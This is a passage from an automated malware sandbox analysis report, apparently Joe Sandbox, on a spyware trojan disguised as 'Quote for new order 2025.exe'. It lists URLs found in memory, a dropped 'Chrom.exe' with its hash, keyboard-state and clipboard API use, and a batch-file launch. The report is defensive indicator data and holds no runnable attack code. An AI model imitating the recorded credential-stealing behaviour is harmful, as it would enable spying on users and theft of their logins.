                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                          Source: bhv428D.tmp.14.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                          Source: bhv428D.tmp.14.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                          Source: Chrom.exe, 00000004.00000002.1693924423.0000000000590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfLMEM
                          Source: Chrom.exe, 00000004.00000003.1693528910.000000000098D000.00000004.00000020.00020000.00000000.sdmp, Chrom.exe, 00000008.00000002.1819462816.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, Chrom.exe, 00000008.00000003.1818673130.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, Chrom.exe, 0000000E.00000002.1901947564.000000000084D000.00000004.00000020.00020000.00000000.sdmp, Chrom.exe, 0000000E.00000003.1900947735.000000000084D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
                          Source: bhv428D.tmp.14.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
                          Source: Chrom.exeString found in binary or memory: https://login.yahoo.com/config/login
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://www.digicert.com/CPS0
                          Source: Chrom.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://www.office.com/
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_0041138D OpenClipboard,GetLastError,DeleteFileW,4_2_0041138D
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_00409E39 EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_00409E39
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_00409EA1 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,4_2_00409EA1
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5E8F1 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_09E5E8F1
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 5_2_06F5E8B0 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,5_2_06F5E8B0
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 11_2_0759E8B0 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,11_2_0759E8B0

                          System Summary

                          barindex
                          Initial sample is a PE file and has a suspicious name
                          Source: initial sampleStatic PE information: Filename: Quote for new order 2025.exe
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,4_2_0040BAE3
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_0155C1B80_2_0155C1B8
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_0155DBD00_2_0155DBD0
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_0798A0D00_2_0798A0D0
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_0798CE300_2_0798CE30
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_0798B8C80_2_0798B8C8
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_0798D8E80_2_0798D8E8
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_079898000_2_07989800
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_079894B80_2_079894B8
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_0798CE300_2_0798CE30
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_07984F080_2_07984F08
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E064E80_2_09E064E8
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E017D00_2_09E017D0
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5F8310_2_09E5F831
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E53A900_2_09E53A90
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E53A900_2_09E53A90
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E583B80_2_09E583B8
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_0044A0304_2_0044A030
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_0040612B4_2_0040612B
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_0043E13D4_2_0043E13D
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_0044B1884_2_0044B188
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_004422734_2_00442273
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_0044D3804_2_0044D380
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_0044A5F04_2_0044A5F0
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_004125F64_2_004125F6
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_004065BF4_2_004065BF
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_004086CB4_2_004086CB
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_004066BC4_2_004066BC
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_0044D7604_2_0044D760
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_00405A404_2_00405A40
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_00449A404_2_00449A40
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_00405AB14_2_00405AB1
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_00405B224_2_00405B22
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_0044ABC04_2_0044ABC0
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_00405BB34_2_00405BB3
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_00417C604_2_00417C60
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_0044CC704_2_0044CC70
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_00418CC94_2_00418CC9
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_0044CDFB4_2_0044CDFB
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_0044CDA04_2_0044CDA0
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_0044AE204_2_0044AE20
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_00415E3E4_2_00415E3E
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_00437F3B4_2_00437F3B
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 5_2_0097AF085_2_0097AF08
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 5_2_0097C1B85_2_0097C1B8
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 5_2_0097DBD05_2_0097DBD0
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 5_2_06F5F7F15_2_06F5F7F1
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 5_2_06F504585_2_06F50458
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 5_2_06F571985_2_06F57198
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 5_2_06F57A685_2_06F57A68
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 5_2_06F56E505_2_06F56E50
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 5_2_06F504585_2_06F50458
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 5_2_06F863B05_2_06F863B0
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 5_2_06F817105_2_06F81710
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 5_2_087B98305_2_087B9830
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 5_2_087BA2E85_2_087BA2E8
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 5_2_087B82D85_2_087B82D8
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 5_2_087B98305_2_087B9830
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 5_2_087B4F085_2_087B4F08
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 11_2_02A5AF0811_2_02A5AF08
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 11_2_02A5C1B811_2_02A5C1B8
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 11_2_02A5DBD011_2_02A5DBD0
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 11_2_02A5190C11_2_02A5190C
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 11_2_0759F7F111_2_0759F7F1
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 11_2_0759045811_2_07590458
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 11_2_0759719811_2_07597198
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 11_2_07597A6811_2_07597A68
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 11_2_07596E5011_2_07596E50
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 11_2_0759045811_2_07590458
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 11_2_075C0FD811_2_075C0FD8
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 11_2_075C5E5811_2_075C5E58
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 11_2_08C1983011_2_08C19830
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 11_2_08C182D811_2_08C182D8
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 11_2_08C1A2E811_2_08C1A2E8
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 11_2_08C1983011_2_08C19830
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 11_2_08C14F0811_2_08C14F08
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\Chrom.exe 53043BD27F47DBBE3E5AC691D8A586AB56A33F734356BE9B8E49C7E975241A56
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: String function: 0044DDB0 appears 33 times
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: String function: 004186B6 appears 58 times
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: String function: 004188FE appears 88 times
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: String function: 00418555 appears 34 times
                          Source: Quote for new order 2025.exe, 00000000.00000002.3530691403.000000000345D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Quote for new order 2025.exe
                          Source: Quote for new order 2025.exe, 00000000.00000002.3529083783.000000000158E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Quote for new order 2025.exe
                          Source: Quote for new order 2025.exe, 00000005.00000002.3530288167.000000000256D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Quote for new order 2025.exe
                          Source: Quote for new order 2025.exe, 0000000B.00000002.3529863966.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Quote for new order 2025.exe
                          Source: Quote for new order 2025.exeBinary or memory string: OriginalFilenameFoxmaiI.exe4 vs Quote for new order 2025.exe
                          Source: classification engineClassification label: mal84.troj.spyw.winEXE@21/9@1/1
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_0041A225 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,4_2_0041A225
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_0041A6AF GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,4_2_0041A6AF
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_00415799 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,4_2_00415799
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_00416A46 FindResourceW,SizeofResource,LoadResource,LockResource,4_2_00416A46
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeFile created: C:\Users\user\Desktop\Chrom.exeJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1436:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
                          Source: C:\Users\user\Desktop\Chrom.exeFile created: C:\Users\user\AppData\Local\Temp\bhvF18F.tmpJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "
                          Source: Quote for new order 2025.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: Quote for new order 2025.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.69%
                          Source: C:\Users\user\Desktop\Chrom.exeSystem information queried: HandleInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: Quote for new order 2025.exe, 00000000.00000000.1658990510.0000000000E92000.00000002.00000001.01000000.00000003.sdmp, Chrom.exe, Chrom.exe, 00000004.00000000.1676249370.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000002.1819130753.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000000.1800979457.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000000.1883289782.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000002.1901575324.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe.0.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                          Source: Quote for new order 2025.exe, 00000000.00000000.1658990510.0000000000E92000.00000002.00000001.01000000.00000003.sdmp, Chrom.exe, Chrom.exe, 00000004.00000000.1676249370.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000002.1819130753.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000000.1800979457.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000000.1883289782.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000002.1901575324.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe.0.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                          Source: Quote for new order 2025.exe, 00000000.00000000.1658990510.0000000000E92000.00000002.00000001.01000000.00000003.sdmp, Chrom.exe, 00000004.00000000.1676249370.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000002.1819130753.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000000.1800979457.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000000.1883289782.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000002.1901575324.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe.0.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
